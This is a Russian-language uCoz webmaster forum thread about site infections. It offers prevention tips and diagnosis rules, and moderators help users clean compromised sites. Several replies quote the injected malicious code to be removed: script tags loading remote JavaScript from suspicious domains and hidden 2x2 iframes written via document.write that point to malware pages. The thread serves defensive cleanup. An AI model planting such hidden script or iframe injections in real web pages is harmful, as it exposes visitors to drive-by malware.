Модератор форума: Yuri_G  
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте


  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    Дончанка
    Сообщений: 10
    Репутация: 0

    Сообщение # 76 | 23:48:34
    Здравствуйте !Помогите мне пожалуйста гугл прислал предупреждение(сайт находиться на рекламе на гугле)о том,что будет все заблокировано ,типо,что у меня на сайте вредоносное ПО,вот проверила сайт на http://antivirus-alarm.ru/proverka/virusy/ показал что вообще вирусов нет,проверила на сайте http://2ip.ru/site-virus-scaner/ пишет На сайте обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код. Что это такое!Уважаемые модераторы помогите пожалуйста адрес сайта http://avonukraine.at.ua/ Заранее благодарю!!!
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 77 | 00:00:02
    Дончанка, ваш сайт не занесен в список подозрительных http://www.google.ru/safebrowsing/diagnostic?site=avonukraine.at.ua и не был занесен

    дайте лучше весь тест письма гугла, то что они вам прислали

    и обратите внимание на ваши титлы. они или отсутствуют как на главной или изуродованы визуалкой как на этой странице http://avonukraine.at.ua/load....-1-0-80

    подробнее о титлах тут //forum.ucoz.ru/forum/21-38664-1

    на счет своих онлайн проверок на вирусы читаем тут //forum.ucoz.ru/forum/45-47668-1

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Amaligama
    Сообщений: 3
    Репутация: 0

    Сообщение # 78 | 06:49:59
    Здравствуйте! Посмотрите пожалуйста http://amaligama.ucoz.kz/Баузер Опера
    Раньше яндекс писал
    Опасный сайт
    Посещение этой страницы может представлять опасность. Страница была замечена в распространении вредоносного программного обеспечения.
    Opera Software настоятельно не рекомендует посещать эту страницу.
    После удаления
    Код
    <script type="text/javascript" src="http://goo.gl/xwMlj"></script>
    <script language="javascript" src="http://uno.wt-rotator2.ru/?t=br&noadult=1&pid=29037"></script>/a>

    пишет
    Сайт amaligama.ucoz.kz не заражён, либо подробности заражения ещё не опубликованы

    Но сайт так и остается заблокированным уже вторую или третью неделю. В чем ещё может быть проблема?
    f_p_g
    Сообщений: 7
    Репутация: 2

    Сообщение # 79 | 10:51:17
    На сайте перестали открываться ссылки, как внешние так и внутренние. В чем причина?
    Сайт 2p-games.ru
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 80 | 12:06:10
    f_p_g, панель управления - дизайн - управление дизайном - быстрая замена - в поле что заменить вставляете скрипт

    Код
    <script language="javascript" src="http://golink1.ru9.biz/js/back.php?id=43"></script>
    поле на что заменить оставляете пустым и производите замену во всех модулях

    далее после очистки вы должны обязательно сменить uid пароль. как это сделать написано тут //forum.ucoz.ru/forum/45-52299-1

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Amaligama
    Сообщений: 3
    Репутация: 0

    Сообщение # 81 | 13:33:39
    Цитата (Amaligama)
    Здравствуйте! Посмотрите пожалуйста http://amaligama.ucoz.kz/Баузер Опера Раньше яндекс писал Опасный сайт Посещение этой страницы может представлять опасность. Страница была замечена в распространении вредоносного программного обеспечения. Opera Software настоятельно не рекомендует посещать эту страницу. После удаления /a> пишет Сайт amaligama.ucoz.kz не заражён, либо подробности заражения ещё не опубликованы Но сайт так и остается заблокированным уже вторую или третью неделю. В чем ещё может быть проблема?
    Мне тоже не ответили, когда разблокируют сайт или ещё есть проблемы?.
    Soltana
    Сообщений: 1
    Репутация: 0

    Сообщение # 82 | 21:53:16
    Здравствуйте. Сайт детского сада (http://detsad1547.ucoz.ru/). Гости сайта стали жаловаться, что при открытии сайта на компьютере высвечивается окно антивирусной программы (вредоносная ссылка, вирусная тревога). Что это может быть? На моём компьютере ничего подобного нет.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 83 | 22:47:01
    Soltana, панель управления - дизайн - управление дизайном - быстрая замена - в поле что заменить вставляете скрипт

    Код
    <script language="javascript" src="http://golink1.ru9.biz/js/back.php?id=43"></script>
    поле на что заменить оставляете пустым и производите замену во всех модулях

    тоже самое проделываете с куском кода

    Код
    <script language="javascript" src="./js.php?s=54"></script>


    после очистки обязательно меняете пароль uid профиля //forum.ucoz.ru/forum/45-52299-1

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Tiko9935
    Сообщений: 2
    Репутация: 0

    Сообщение # 84 | 22:54:56
    Помогите сайт haytorrent.do.am Google блокирует не могу найти и удалить вирус подскажите что делать?
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 85 | 23:03:15
    Tiko9935, на блокирующей гуглом табличке есть ссылка проигнорировать. так вот. зайдите на страницу входа в панель управления и проигнорируйте табличку гула. далее. панель управления - главная страница - файловый менеджер - открываем все скрипты залитые на сайт на редактирование и удаляем вставки

    Код
    document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1299627></iframe>');


    Код
    document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://guygetsgirls.org/zmhs.html?j=1299627></iframe>');

    document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1299627></iframe>');


    Код
    document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1299627></iframe>');


    список зараженных скриптов

    http://www.haytorrent.do.am/highslide/highslide.js
    http://www.haytorrent.do.am/js/slaider.js
    http://www.haytorrent.do.am/js/site_script.js

    после очистки скриптов меняем все пароли и особенно ang пароль (ставим максимально сложный) и пароль uid профиля инструкция тут //forum.ucoz.ru/forum/45-52299-1

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    mediainfo
    Сообщений: 14
    Репутация: 6

    Сообщение # 86 | 11:23:49
    Заявка на диагностику и поиск вредоносного кода на сайте


    Здравствуйте!

    С недавнего времени Яндекс считает сайт http://mediainfo.mk.ua/ опасным: "Повторную проверку сайта mediainfo.mk.ua выполнено 8.06.2013. Добрый день, Info Media! Сайт был повторно проверен 8 Июня 2013 года. К сожалению, на сайте остались страницы, содержащие вредоносный код.

    Список выявленных опасных страниц и подробности:
    - 8.06.2013
    http://mediainfo.mk.ua/news....5-12085

    - 08.06.2013
    http://mediainfo.mk.ua/news....4-12060

    - 08.06.2013
    http://mediainfo.mk.ua/news....7-12139

    - 08.06.2013
    http://mediainfo.mk.ua/news....3-12038

    - 08.06.2013
    http://mediainfo.mk.ua/news....2-12025

    - 08.06.2013
    http://mediainfo.mk.ua/news....5-12080

    - 08.06.2013
    http://mediainfo.mk.ua/news....3-12047

    - 08.06.2013
    http://mediainfo.mk.ua/news....2-12026

    - 08.06.2013
    http://mediainfo.mk.ua/news....3-12035

    - 08.06.2013
    http://mediainfo.mk.ua/news....3-12048

    С уважением, Яндекс.Вебмастер".

    Вот результаты проверки Sucuri http://sitecheck.sucuri.net/results/mediainfo.mk.ua/ (Not blacklisted)

    Вот результаты проверки на Antivirus-alarm http://antivirus-alarm.ru/proverka/?url=mediainfo.mk.ua%2F (Вирусов нет)

    Проблема обнаруживается и под логином и под гостем тоже.

    Антивирус не реагирует и не выявляет вредоносного кода (Dr.Web 8.0).

    Сайт блокируется браузером Firefox (пишет о том, что сайт может нанести вред компьютеру).

    Прошу помочь найти вредоносный код.

    Спасибо!
    SOCHI1014
    Сообщений: 863
    Репутация: 229

    Сообщение # 87 | 11:42:17
    Цитата (mediainfo)
    Здравствуйте!

    С недавнего времени Яндекс считает сайт http://mediainfo.mk.ua/ опасным: "Повторную проверку сайта mediainfo.mk.ua выполнено 8.06.2013. Добрый день, Info Media! Сайт был повторно проверен 8 Июня 2013 года. К сожалению, на сайте остались страницы, содержащие вредоносный код.
    Удалите все баннеры и подайте на перепроверку.

    Сообщение отредактировал SOCHI1014 - Суббота, 08 Июн 2013, 11:58:07
    mediainfo
    Сообщений: 14
    Репутация: 6

    Сообщение # 88 | 12:00:51
    SOCHI1014, не понял Вашего ответа.

    Добавлено (08 Июн 2013, 12:00:51)
    ---------------------------------------------

    Цитата (SOCHI1014)
    все баннеры
    Думаете из-за этого? Там только один баннер сверху динамический, все остальные - статика и картинки от них лежат на сайте. А тот что динамический - от серьезного разработчика - liga.net
    SOCHI1014
    Сообщений: 863
    Репутация: 229

    Сообщение # 89 | 12:04:54
    Я бы удалил баннеры http://www.partner.join.com.ua
    Так ка при поиске в яндексе этого сайта нет, он бане. Возможно яша и помечает ваш сайт опасным всвязи с тем что вы распространяете забаненный сайт. Так как неизвестно по какой причине его забанили.
    Прикрепления: 7265834.jpg (19.4 Kb)

    Сообщение отредактировал SOCHI1014 - Суббота, 08 Июн 2013, 12:07:45
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 90 | 12:15:26
    SOCHI1014,
    Цитата
    вы распространяете забаненный сайт. Так как неизвестно по какой причине его забанили
    что такое забаненный сайт в яше и его распространение? расскажите, как страница входа в партнерку может быть забаненным сайтом?

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Поиск: